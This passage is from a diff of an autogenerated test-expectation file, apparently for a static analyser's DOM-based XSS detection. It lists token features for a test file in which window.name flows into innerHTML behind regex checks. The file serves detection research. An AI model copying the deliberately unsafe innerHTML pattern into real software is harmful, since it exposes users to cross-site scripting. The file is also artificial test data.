    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:25 | regex.test(tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:7:22:25 | regex.test(tainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:13:22:16 | test | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:13:22:16 | test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:13:22:16 | test | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:13:22:16 | test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:22:13:22:16 | test | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:22:18:22:24 | tainted | CalleeFlexibleAccessPath | regex.test | | autogenerated/Xss/DomBasedXss/sanitiser.js:22:18:22:24 | tainted | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/sanitiser.js:22:18:22:24 | tainted | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | @@ -14900,12 +108086,37 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:22:18:22:24 | tainted | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:22:18:22:24 | tainted | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:22:18:22:24 | tainted | receiverName | regex | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:5:23:7 | elt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:5:23:7 | elt | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:5:23:7 | elt | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:5:23:7 | elt | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:5:23:7 | elt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:5:23:17 | elt.innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:5:23:17 | elt.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:5:23:17 | elt.innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:5:23:17 | elt.innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:5:23:17 | elt.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:5:23:44 | elt.inn ... '    ' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:5:23:44 | elt.inn ... '' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:5:23:44 | elt.inn ... '' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:5:23:44 | elt.inn ... '' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:5:23:44 | elt.inn ... '' | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:9:23:17 | innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:9:23:17 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:9:23:17 | innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:9:23:17 | innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:9:23:17 | innerHTML | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:23:21:23:25 | '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:23:21:23:25 | '' | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:23:21:23:25 | '' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:23:21:23:25 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:23:21:23:25 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:23:21:23:25 | '' | stringConcatenatedWith | -endpoint- tainted + '' | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:21:23:35 | '' + tainted | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:21:23:35 | '' + tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:21:23:35 | '' + tainted | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:21:23:35 | '' + tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:23:21:23:35 | '' + tainted | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:23:21:23:44 | '' + ... '' | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/sanitiser.js:23:21:23:44 | '' + ... '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:23:21:23:44 | '' + ... '' | contextSurroundingFunctionParameters | () | @@ -14924,12 +108135,37 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:23:39:23:44 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:23:39:23:44 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:23:39:23:44 | '    ' | stringConcatenatedWith | '' + tainted -endpoint- | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:5:25:7 | elt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:5:25:7 | elt | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:5:25:7 | elt | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:5:25:7 | elt | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:5:25:7 | elt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:5:25:17 | elt.innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:5:25:17 | elt.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:5:25:17 | elt.innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:5:25:17 | elt.innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:5:25:17 | elt.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:5:25:44 | elt.inn ... '    ' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:5:25:44 | elt.inn ... '    ' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:5:25:44 | elt.inn ... '    ' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:5:25:44 | elt.inn ... '    ' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:5:25:44 | elt.inn ... '    ' | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:9:25:17 | innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:9:25:17 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:9:25:17 | innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:9:25:17 | innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:9:25:17 | innerHTML | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:25:21:25:25 | '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:25:21:25:25 | '' | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:25:21:25:25 | '' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:25:21:25:25 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:25:21:25:25 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:25:21:25:25 | '' | stringConcatenatedWith | -endpoint- tainted + '' | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:21:25:35 | '' + tainted | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:21:25:35 | '' + tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:21:25:35 | '' + tainted | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:21:25:35 | '' + tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:25:21:25:35 | '' + tainted | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:25:21:25:44 | '' + ... '' | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/sanitiser.js:25:21:25:44 | '' + ... '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:25:21:25:44 | '' + ... '' | contextSurroundingFunctionParameters | () | @@ -14948,6 +108184,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:25:39:25:44 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:25:39:25:44 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:25:39:25:44 | '    ' | stringConcatenatedWith | '' + tainted -endpoint- | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:7:27:26 | !regex.test(tainted) | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:7:27:26 | !regex.test(tainted) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:7:27:26 | !regex.test(tainted) | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:7:27:26 | !regex.test(tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:7:27:26 | !regex.test(tainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:12 | regex | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:12 | regex | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:12 | regex | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:12 | regex | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:12 | regex | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:17 | regex.test | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:17 | regex.test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:17 | regex.test | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:17 | regex.test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:17 | regex.test | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:26 | exceptional return of regex.test(tainted) | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:26 | exceptional return of regex.test(tainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:26 | exceptional return of regex.test(tainted) | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:26 | exceptional return of regex.test(tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:26 | exceptional return of regex.test(tainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:26 | regex.test(tainted) | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:26 | regex.test(tainted) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:26 | regex.test(tainted) | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:26 | regex.test(tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:8:27:26 | regex.test(tainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:14:27:17 | test | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:14:27:17 | test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:14:27:17 | test | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:14:27:17 | test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:27:14:27:17 | test | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:27:19:27:25 | tainted | CalleeFlexibleAccessPath | regex.test | | autogenerated/Xss/DomBasedXss/sanitiser.js:27:19:27:25 | tainted | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/sanitiser.js:27:19:27:25 | tainted | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | @@ -14956,12 +108222,37 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:27:19:27:25 | tainted | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:27:19:27:25 | tainted | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:27:19:27:25 | tainted | receiverName | regex | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:5:28:7 | elt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:5:28:7 | elt | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:5:28:7 | elt | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:5:28:7 | elt | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:5:28:7 | elt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:5:28:17 | elt.innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:5:28:17 | elt.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:5:28:17 | elt.innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:5:28:17 | elt.innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:5:28:17 | elt.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:5:28:44 | elt.inn ... '    ' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:5:28:44 | elt.inn ... '    ' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:5:28:44 | elt.inn ... '    ' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:5:28:44 | elt.inn ... '    ' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:5:28:44 | elt.inn ... '    ' | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:9:28:17 | innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:9:28:17 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:9:28:17 | innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:9:28:17 | innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:9:28:17 | innerHTML | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:28:21:28:25 | '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:28:21:28:25 | '' | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:28:21:28:25 | '' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:28:21:28:25 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:28:21:28:25 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:28:21:28:25 | '' | stringConcatenatedWith | -endpoint- tainted + '' | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:21:28:35 | '' + tainted | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:21:28:35 | '' + tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:21:28:35 | '' + tainted | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
